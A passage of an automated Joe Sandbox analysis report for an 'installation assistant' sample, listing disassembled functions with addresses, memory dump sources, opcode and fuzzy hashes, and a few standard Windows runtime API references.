                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                              • Instruction ID: 13c7d4ae395a7b90b500c27fc814dcbb0e37a9d1c4b34443309e887fb9c5f34d
                              • Opcode Fuzzy Hash: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                              • Instruction Fuzzy Hash: 3AF1C070509B618BC328DF2ED49026AFBF1BF85308F188B2ED5D686A81D339E195CF51
                              Function 6CA76900 Relevance: .3, Instructions: 341COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                              • Instruction ID: 7c2e971641d031e49fc6e51457bc7b5abf37a3849f4ebdf83fae5f23143d92e5
                              • Opcode Fuzzy Hash: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                              • Instruction Fuzzy Hash: CFC1C075604B068BE338CF2DC5906AAB7E2FBC4314F548A2DC1A6C7B45D670F899CB91
                              Function 6CA94DE0 Relevance: .3, Instructions: 333COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                              • Instruction ID: 44b3e45055e25044c663b5ddb1958a92546a061c946971eb6d41e73022d1e875
                              • Opcode Fuzzy Hash: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                              • Instruction Fuzzy Hash: E3E1E7B18047A64FE398EF5CDCA5A3577A1EBC8300F4B423DDA650B392D734A942DB94
                              Function 6CA72580 Relevance: .3, Instructions: 316COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                              • Instruction ID: ac110a9f9ec0dfd114b7bf92a397f4d06358a46a7e3672018bc910264cb01f1d
                              • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                              • Instruction Fuzzy Hash: B5C1B3392047418BC728CF39D1A4697BBE2FFD9314F188A6DC4CA4BB55DA30A84DCB65
                              Function 6CA7E4D0 Relevance: .3, Instructions: 307COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                              • Instruction ID: bb439fffbca4cb0627f679e74d2fd8b3ee00baa52b9e65b529b5ba0708042f5e
                              • Opcode Fuzzy Hash: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                              • Instruction Fuzzy Hash: EEB17075A012448FC350DF29C884284BBA2FF8532CB79969EC5948F646E337D887CBE1
                              Function 6CA94870 Relevance: .3, Instructions: 298COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                              • Instruction ID: 39f4b7684e5c6609b32f836141c041b30dae703810a8796e00fee9e6fc3ae8b8
                              • Opcode Fuzzy Hash: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                              • Instruction Fuzzy Hash: 7FD1F8B1848B9A5FD394EF4DEC82A357762AF88301F4A8239DB6007753D634BB12D794
                              Function 6CA6E810 Relevance: .3, Instructions: 296COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                              • Instruction ID: ff9a457ad3cfbde2c7b4b4b38dc7268beda8af5d171849971ba8682abe2ae288
                              • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                              • Instruction Fuzzy Hash: A1B1BF31309B054BD324DF3AC9907EAB7E1AF84748F14492DC5AA87B81EF31A98DC795
                              Function 6CA745D0 Relevance: .2, Instructions: 224COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                              • Instruction ID: 93288e3eaf0bb1e64fd26b4850349c2d21813eb5dd625b6f1ab1b160ce86fde4
                              • Opcode Fuzzy Hash: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                              • Instruction Fuzzy Hash: 946130B63082158FD308CF99E580A96B3E5EB99321B1685BED105CB361E775DC85CB28
                              Function 6CA88520 Relevance: .2, Instructions: 216COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                              • Instruction ID: 17d50829a3c4010058d642cd059d8c16680a90d0b6fd7da5cc4a10207f5780f4
                              • Opcode Fuzzy Hash: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                              • Instruction Fuzzy Hash: D8917FB281971A8BD314CF1CD88025AB7E0FB88318F49067DED99A7381D739EA55CBC5
                              Function 6CA10B66 Relevance: .2, Instructions: 167COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                              • Instruction ID: 3ca05999ed2ac996108670560d694f0a6229bd4d3b15b75f1a8b12555668695e
                              • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                              • Instruction Fuzzy Hash: C651AE72F146099FDB08CE98DD916EDBBF2EB88308F248169D011E7B81D7749B91CB80
                              Function 6CA12EC9 Relevance: .1, Instructions: 136COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                              • Instruction ID: ae68eb1a6be50b06b07be19d964f1d3988bcbcd918a37de3a5226d01368bfc70
                              • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                              • Instruction Fuzzy Hash: EA3114277A840103D70CCD3BCC1679F91635BD562A70ECF396C05DEF95D52CC8524144
                              Function 6CA7EEF0 Relevance: .1, Instructions: 123COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                              • Instruction ID: 8811025306f43d2442b0c7ce9dc8999fdd4e889aeb81d0be923fb3b7804228a1
                              • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                              • Instruction Fuzzy Hash: FD31FA7B5049050EF221862E8D843967223FFC2368F2DC76DDD6687FECDA71968781A1
                              Function 6CA86820 Relevance: .1, Instructions: 112COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                              • Instruction ID: 92a599b1699f8d13f312cbf94881285d476b75d033b2de85f89a3702b85d5b3b
                              • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                              • Instruction Fuzzy Hash: AA41B3B19057068BE704CF19C89056AB3E4FF88318F454A6DED5AD7381E330EA55CB91
                              Function 6CA946C0 Relevance: .1, Instructions: 88COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                              • Instruction ID: 74e7dd957d892f3e554c47dc16c4403eefe52d0036354a1a80b589f3580baefa
                              • Opcode Fuzzy Hash: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                              • Instruction Fuzzy Hash: E82148B1A147EA07F7209E6DCCC137577D29BC2305F0D4279DAB08FA87E17984A2D660
                              Function 6CA9A91A Relevance: .1, Instructions: 73COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                              • Instruction ID: 0b4395ba64db7d4366e079ec1ee41de6cde06fa3407ab7ea0999caf883d7aea0
                              • Opcode Fuzzy Hash: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                              • Instruction Fuzzy Hash: 69213A729244254BC301DF5EE889777B3E2FFC431DF678A2BD9928B581C624D880C6A0
                              Function 6CA9AA00 Relevance: .1, Instructions: 73COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                              • Instruction ID: 6dc8373582d36d3d27d2cc0aa072835599c870a85e9e3c13b24291bfc0aa2045
                              • Opcode Fuzzy Hash: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                              • Instruction Fuzzy Hash: 45213B33A011188FC701EF6AD98469B73E6FFC4365F67C63EDD8147644C530E9068650
                              Function 6CA867A0 Relevance: .0, Instructions: 41COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                              • Instruction ID: 80c9bca6817d8d530572eb60cb49c83592fb723d5f4b2416861a5d64bb14fa48
                              • Opcode Fuzzy Hash: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                              • Instruction Fuzzy Hash: 3701817291462E57DB189F48CC41136B390FB85312F49823ADD479B385E734F970C6D4
                              Function 6C9DA2D6 Relevance: .0, Instructions: 29COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eda4edc8969a77ab23eba8bfeacb3ccb98eeec7e899311488295affe48399119
                              • Instruction ID: a71a6ab1cb15c091fdb16f308bc638ea1a472a18d0de41e0ebb140bfbad624f0
                              • Opcode Fuzzy Hash: eda4edc8969a77ab23eba8bfeacb3ccb98eeec7e899311488295affe48399119
                              • Instruction Fuzzy Hash: FBF03031A25724DBCB16CB8CD905B89B3BDEB45B65F128096F501EBA80C7B0EE40C7C4
                              Function 6C9DA2A5 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                              • Instruction ID: c32f2c0fea54bbd044f4c8e0744b1bd8c8977ce4b8e7866d9d382df2a8cae73c
                              • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                              • Instruction Fuzzy Hash: E1E08C32912678EBCB14CB89D900D8AF3ECEB44A14B1281A6FA02E3A00C674EE40D7C0
                              Function 6CA2EB50 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 341COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                              • API String ID: 3519838083-609671
                              • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                              • Instruction ID: be9af70d7b447660bee23593bf6588a5f436d19265e22e50344cc649301d8fae
                              • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                              • Instruction Fuzzy Hash: 31D1B171A04219EFCF15CFB4D980AEEB7B5FF05309F284519E055A3A50DB78A9C9CBA0
                              Function 6CA16798 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 461COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __aulldiv$H_prolog
                              • String ID: >WJ$x$x
                              • API String ID: 2300968129-3162267903
                              • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                              • Instruction ID: 7633ff24a78d3e1668576dbf545ae370590ef0e8d82cc3b98b738d475c03ab4f
                              • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                              • Instruction Fuzzy Hash: 0E125871904219EFDF10DFA4C984AEDBBB5FF08318F248169E815EBB50D7359A89CB50
                              Function 6C9CA040 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                              Download Yara Rule
                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 6C9CA077
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6C9CA07F
                              • _ValidateLocalCookies.LIBCMT ref: 6C9CA108
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6C9CA133
                              • _ValidateLocalCookies.LIBCMT ref: 6C9CA188
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              • Opcode ID: ddf6838298c873276b702abc2c8e8faf63db9ea4d1f7e5006f45ec46a2623709
                              • Instruction ID: ecacecc0190a816c1e6b1ed472f98b4cbdd85d4fb4d211ce1992ec970d1160d2
                              • Opcode Fuzzy Hash: ddf6838298c873276b702abc2c8e8faf63db9ea4d1f7e5006f45ec46a2623709
                              • Instruction Fuzzy Hash: 0A41B134B012189FCF00DF68C880AEE7BB5AF66368F20C155E814AB751DB35EA05CB93
                              Function 6C9D740A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: api-ms-$ext-ms-
                              • API String ID: 0-537541572
                              • Opcode ID: 52df8513f561f7946371f904509cf2004675882bfe48922db3dc199ea5bf4ba9
                              • Instruction ID: f388c146dd30057fb394cdc000fb9a4080f2a5402ae49783c5df5e4f7bc5eeb5
                              • Opcode Fuzzy Hash: 52df8513f561f7946371f904509cf2004675882bfe48922db3dc199ea5bf4ba9
                              • Instruction Fuzzy Hash: DB210B31A05E11ABDB138A6D9C40A5E3F6E9F06779F238150EC25B7684EB34FC0186F1
                              Function 6C9DC421 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetConsoleCP.KERNEL32(?,6C9DB640,?), ref: 6C9DC469
                              • __fassign.LIBCMT ref: 6C9DC648
                              • __fassign.LIBCMT ref: 6C9DC665
                              • WriteFile.KERNEL32(?,6C9E6026,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C9DC6AD
                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C9DC6ED
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C9DC799
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
